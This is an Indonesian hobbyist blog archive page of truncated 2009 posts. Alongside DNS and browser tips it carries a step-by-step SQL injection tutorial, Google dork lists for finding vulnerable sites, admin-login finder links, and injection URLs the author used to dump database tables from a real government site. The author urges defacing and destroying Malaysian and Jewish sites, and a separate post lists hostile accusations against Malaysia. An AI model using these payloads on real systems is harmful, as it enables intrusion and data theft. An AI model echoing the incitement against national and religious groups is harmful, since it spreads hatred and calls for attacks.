Postingan

Menampilkan postingan dari Desember, 2009

Add ons pada mozilla yang patut dicoba

Kenapa Malaysia adalah negara paling dibenci oleh negara-negara ASEAN

Berikut alasan kenapa Malaysia adalah negara paling dibenci oleh negara-negara ASEAN

*mencuri PERLIS dari THAILAND pada tahun 1959
*mencuri serawak dan sabah dari INDONESIA PADA TAHUN 1957
*MENCURI PULAU SIPADAN DAN LIGITAN dari indonesia
*mencuri langkawi pada tahun 1961
*mencuri kebudayaan INDONESIA
*NEGARA PENGGANGGU kedaulatan WILAYAH INDONESIA,THAILAND DAN PHILIPINA
*pencuri perairan PALAWAN SELATAN dari PHILIPINA
*PNCURI LAUT BARAT DAYA PHLIPINA
*PENCURI PULAU SEBATIK UTARA dari INDONESIA
*PENCURI LAGU TERANG BULAN dan menjadikan lagu ini sebagai lagu kebangsaan MALAYSIA dari INDONESIA

*PENCURI LAGU RASA SAYANG-SAYANGE DARI INDONESIA
*PENCURI TARIAN REOG PNOROGO ASAL INDONESIA
*PENCURI TARI PENDET ASAL INDONESIA
*PENCURI ALAT MUSIK ANGKLUNG DARI INDONESIA
*PENCURI KEBUDAYAAN PHILIPINA SELATAN
*PENCURI KEBUDAYAAN MELAYU VIETNAM
*PENCURI KEBUDAYAAN INDIA
*PENCURI WAYANG KULIT ASAL INDONESIA
*SULTAN MALAYSIA PENCURI WANITA-WANITA CANTIK contoh nya:
-manohara asal indonesia
-calva…

Google Public DNS

Gambar
Wah emang yahud nih mbah google. pertama udah nyediain kita gmail yang mempunyai kapasitas ruang penyimpanan terbesar (untuk golongan free), lalu yang paling maknyuss adalah search enginenya yang top markotop,, lalu simbah mengakusisi beberapa perusahaan besar seperti youtube ,ckckck masih banyak juga produk-produk dari simbah Google yang ueedaaann teennaann. yang terbaru simbah mengeluarkan Google Public DNS. Katanya jika browsing menggunakan DNS gratis ini akan terasa lebih cepat.
berikut cara memasang Google Public DNS

1. Pertama buka start lalu control panel buka network and sharing center
2. Buka Local Area Connection atau klik change adapter settings, lalu pilih adapter yang mau diganti DNS nya bisa wirelles atau LAN nya.
3. Klik Properties kemudian pilih Internet Protocol Version 4 untuk Xp pilih Internet Protocol(TCP/IP) pada DNS isikan 8.8.8.8 dan 8.8.4.4







4. Klik OK lalu tes ping melalui cmd untut melihat apakah benar lebih cepat atau tidak

5. Enjoy Browsing

Kalo waktu aku n…

Menghilangkan Iklan di Facebook

Gambar
Ada 2 hal menguntungkan bagi kita jika menghilangkan iklan di facebook.Pertama kita tidak membutuhkan waktu lama untuk membuka halaman facebook, kedua kita terhindar dalam dosa,mengapa karena ada beberapa iklan di facebook yang digunakan untuk mendanai kekejian israhell terhadap saudara muslim kita di palestina.
Dengan menggunakan add ons mozilla bernama "Stylish" kita dapat menghilangkan iklan pada facebook. berikut caranya :

1. download add ons Stylish di link berikut https://addons.mozilla.org/en-US/firefox/addon/2108
2. Install aplikasi Stylish pada mozilla anda
3. Setelah menginstal silahkan restart mozilla anda
4. Buka link ini http://userstyles.org/styles/9405 kemudian klik tombol install with Stylish
5. Facebook anda sudah bebas dari iklan




nb: pada http://userstyles.org/ terdapat banyak sekali stylish yang dapat kita gunakan untuk mozilla kita.

BUGS PADA YAHOO: HACK YAHOO MAIL ACCOUNT(asli penipuan) part II

Xixixi...mungkin ini juga salah saya membiarkan siapapun dapat menulis komen di blog saya. Hal ini saya lakukan agar orang yang membaca dapat memberi komentar dengan bebas namun ada aturannya.
Baru ngecek blog ternyata ada komen baru pada artikel http://mick182.blogspot.com/2009/11/bugs-pada-yahoo-hack-yahoo-mail.html yang jelas-jelas pada artikel saya tersebut menghimbau agar tidak terjerumus hal tersebut, Namun ada seorang pembaca yang memberi komen tapi tidak membaca hingga selesai atau tidak membaca judul dengan jelas mungkin juga yang memberi komen tidak dapat membaca dengan lancar,, mungkin saja to... waktu membaca komentar tersebut saya tertawa hingga perut mules,, pokoknya ini orang aneh bin ajaib sudah jelas artikel tersebut menghimbau agar tidak terkena tipuan murahan tapi orang tersebut malah komen seperti ini

" bohong.itu khan alamat email km, km mw nghack orang yang kirim pesan ke email km khan??

halah,,,, cara yang kyk gne dah kadaluarsa Bro!!

low km hacker, coba re…

Dorks SQli part 2

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:…

SQLi Step by Step

Bismilah hirahman nirahim


Special thanks to vyc0d | bobyhikaru | Indonesian Hacker ,,thx bro you are my inspiration !!!!


Step by Step SQL injection


===[1]===

Mencari target,,
untuk mencari target kalian dapat memakai google dorks untuk SQLi

contoh : http://www.malingshit.my/ganyang.php?id=69
===[2]===

Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak.
cara mengecek dengan menambahkan karakter ' atau - pada akhir alamat url.

contoh : http://www.malingshit.my/ganyang.php?id=69'
http://www.malingshit.my/ganyang.php?id=69-
jika ditemukan error seperti

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/u198/domain/malingshit.my/ganyang.php on line 69
maka target tersebut vuln / dapat di inject.

===[3]===

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+ atau /**/order/**/by/**/
contoh:

http://www.malingshit.my/ganyang.php?id=69+order+by+1--
se…

Admin Login Finder

Gambar
Step terakhir pada SQLi adalah mencari login admin. Percuma dong sudah nyari user dan password admin tapi buat pajangan aja. berikut adalah tool Admin Login Finder online. Monggo di cicipi....

http://r3m1ck.uni.cc/adminfinder/ ----> punya  saya


http://tools.vyc0d.uni.cc/login_finder/











Beberapa Situs yang Mempunyai Bugs SQL

Gambar

Dorks SQLi

Dorks berikut berguna untuk mencari korban SQLi. Caranya buka google.com dan masukan salah satu Dorks di bawah ini . Selamat ber deface ria.... ingat jangan merusak web negeri sendiri,,, kalo sekedar untuk mengingatkan adminnya upload file ajah trus kirim ke adminnya kalo situs malingsial dan yahudi hancurkan sampai ke akar-akarnya...OK.... tooosss you very much....

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=

Apa Itu Google Wave ?

Gambar
Google Wave merupakan layanan terbaru dari Google yang tetelah di rilis tanggal 30 september 2009. Hal ini sekaligus mengejutkan seantero internet dengan software open source terbaru.
Apakah itu Google Wave ????


Semuanya pasti bertanya tanya, Google Wave adalah sebuah produk yang membantu pengguna berkomunikasi dan berkolaborasi di web.Wave adalah percakapan dan dokumen, dimana pengguna dapat berkomunikasi dan bekerja sama dengan teks berformat seperti, foto, video, peta, dan masih banyak lagi. Google wave juga merupakan platform yang kaya dengan API terbuka yang memungkinkan pengembang untuk menanamkan wave dalam layanan web lainnya.
beberapa fitur teknisnya seperti :
1. Real time
2. Embeddability
3. Applications and Extensions
4. Wiki Functionality
5. Open source
6. Play back
7. Natural language
8. Drag and Drop file sharing

SQLi on DEPDIKNAS.GO.ID

Gambar
Lagi suntuk terus ngga sengaja nemu vuln di situs www.depdiknas.go.id . Entah benar atau tidak saya kurang percaya . Masa situs pemerintahan depdiknas.go.id bisa di inject...
lihatlah beberapa screenshoot saya berikut ini :













code yang saya masukan :
http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,version%28%29,4/*&showf=1


code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28table_name%29,4+from+information_schema.tables+where+table_schema=database%28%29/*&showf=1



code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x61646d696e/*&showf=1



code yang saya masukan :

http://www.depdiknas.go.id/content.php?content=file_forumpend&kdtopik=-6%27+union+all+select+0,1,2,group_concat%28I…